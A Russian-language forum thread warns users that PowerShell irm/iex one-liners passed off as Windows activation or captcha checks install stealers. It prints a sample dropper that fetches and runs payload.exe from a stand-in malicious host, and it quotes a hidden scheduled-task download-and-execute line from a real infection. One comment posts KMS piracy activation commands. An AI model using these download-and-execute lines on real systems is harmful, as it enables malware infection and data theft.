Загрузка...

Powershell код в активации Windows и не только: как iex и iwr методы помогают "хакерам"

Тема в разделе Вирусология создана пользователем Doklsi 22 фев 2025. (поднята 8 апр 2025) 1040 просмотров

Загрузка...
  1. Doklsi
    Doklsi Автор темы 22 фев 2025 Ночной лолз - это ебаный даркнет 8249 26 июн 2021
    Всех приветствую, хотелось бы начать с небольшого предисловия. На форуме появляются темы из разряда активации Windows, и многие рекомендуют активировать его через cmd, уверяя, что все безопасно и ничего не подкачивается, но так ли это? Также были темы, где люди попадались на подобные решения, только уже в другом виде, но об этом мы поговорим позже.
    Пример такого ответа:​
    [IMG]
    Разберем что означает каждая из этих команд:
    irm - (Invoke Rest-method) - данный метод используется для получения содержимого с интернет ресурса, через него как раз подгружается другой вредоносный повершеллкод с ресурса, для подгрузки непосредственно малвари.
    iex - (Invoke-Expression) - выполняет полученную строку от команды выше, как код powershell.

    1. Код, подгружаемой строкой на скрине может выглядеть примерно так, очевидно, что это простой дрoпер, бывают вариации добавляющие путь дрoпа в исключения через аддпатчэкслюжен
    • Код
      $url = "http://malicious-site.com/payload.exe"
      $path = "$env:Temp\payload.exe"
      (New-Object System.Net.WebClient).DownloadFile($url, $path)
      Start-Process -FilePath $path
      Думаю понятно, давайте перейдем к реальным кейсам.

      1# Кейс
      К сожалению, материала у меня нет, так как я не мог физически встретить ситуацию, но условно она выглядит так, вы играете на паблике в любой игре, затем вас вызывают на проверку и говорят выполнить эту команду через cmd, затем там идёт обычный вывод, типа проверки, но после нее вы получали .NET щит ратку на устройство


      2# Кейс
      Это непосредственно активация, я буду рассматривать реальный недавний пример юзера этого форума, который наткнулся на это говно.
      Он гуглил как активировать виндовс без сторонних программ, в топе вылезла линк на статью на ресурсе vc.ru. Начало статьи выглядело примерно так
      [IMG]
      Как мы можем заметить, тут уже знакомые нам вариации, я выполнил данную команду в изолированной среде и запустил специальный скрипт, который используя инструмент Event Viewer Windows вытащил запросы Powershell (код - 4104) после выполнения, затемпрогнал их через тулзу для форензики для удобства. Что делала строка? Она выкачала повершеллкод, дрoпающий в темп файл MAS_d08aa00e-57b3-410a-8cb6-c65fe353c99d.cmd после его старта:
      Выцепилась следующая интересная строчка:
      Код
      New-ScheduledTaskAction -Execute powershell.exe -Argument -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm '130.0.235.2*2/0x55/3')"
      * - закрыл специально
      Она создавала запланированную задачу, которая выкачивала и запускала повершеллкод в скрытом режиме по линку 130.0.235.2*2/0x55/3
      [IMG]
      Заглянем в его содержимое [IMG]
      Как мы видим тут уже идёт реализация самого вредоноса, кому интересно его VT - https://www.virustotal.com/gui/file/8ad85e48a936a3c5dd0055304390502d676dce059ab77ce462b746d089f2470b/detection
      К сожалению, он сразу удалялся после выполнения, но я успел выхватить его дамп, на вид это обычный говно-*******, без какой-либо обфускации, отправляющий собранные данные в бота тг, написан крайне хуево и обсуждать здесь нечего
      [IMG]


      [IMG]

      Пример такого распространения через тикток
      [IMG]

      В данном случае команда уже подгружала ******* под названием Vidar
      [IMG]
      Кейс #3 - Капча на сайте
      Вы заходите на сайт, либо телеграм бота и вас просит пройти капчу, примеры:
      [IMG]
      [IMG]
      [IMG]

      Статья вышла небольшой, но просто предупреждение юзерам, что если нихуя не знаете - лучше ничего не вводить, либо пользоваться доверенными решениями, где вы точно уверены что ничего не подхватите. Спасибо за прочтение
     
    22 фев 2025 Изменено
    1. CRAZYDICK2007
      Doklsi, кабута зачем ты ломаешь мои способы пролива
    2. Локет
      Doklsi, тоже эта залупа в шортсах попалась, пон
  2. Y4sperMaglot
    Код
    slmgr /skms kms.digiboy.ir
    slmgr /ipk ключ
    slmgr /ato
    А это безопасно? :sadhamster:
     
    1. Посмотреть предыдущие комментарии (1)
    2. Y4sperMaglot
      Doklsi, а можно как-то отследить запрос?
    3. Doklsi Автор темы
      Y4sperMaglot, любой сниффер трафика в помощь, но смысла заморачиваться нет с этим
      22 фев 2025 Изменено
  3. brokeboylolzteam
    brokeboylolzteam 22 фев 2025 КНОПКА БАБЛО$ - https://lolz.live/threads/8464084 17 094 7 мар 2019
    Теперь еще больше параноик
     
  4. Awr2
    Awr2 10 мар 2025 0 10 мар 2025
    Попался на этот тип развода, судя по дампу оно получается стилит только аппдату?
     
    1. Посмотреть предыдущие комментарии (1)
    2. Awr2
      Doklsi, именно из этой статьи один в один. Получается что другие папки на дисках не трогает?
    3. Doklsi Автор темы
      Awr2, програмфайлс еще
    4. Cartier
      Doklsi, все же люди на начале скачки винды активируют винду обычно во дибилы чо они там варавать сабрались
      2 июн 2025 в 23:13 Изменено
  5. Onyx
    Onyx 28 мар 2025 Заблокирован(а) 560 6 июл 2023
    теперь мне страшно
     
  6. Kuujou_Joutarou
    Kuujou_Joutarou 2 апр 2025 ЛУЧШИЕ ВЕРИФИКАЦИИ - https://lolz.live/threads/4228395/ 5492 27 май 2019
    Йоу йоу йоу спасибо узнал что такая хуйя есть, уже давно бы оратник словил повезло что через проверенных челов активировал :bowing:
     
Top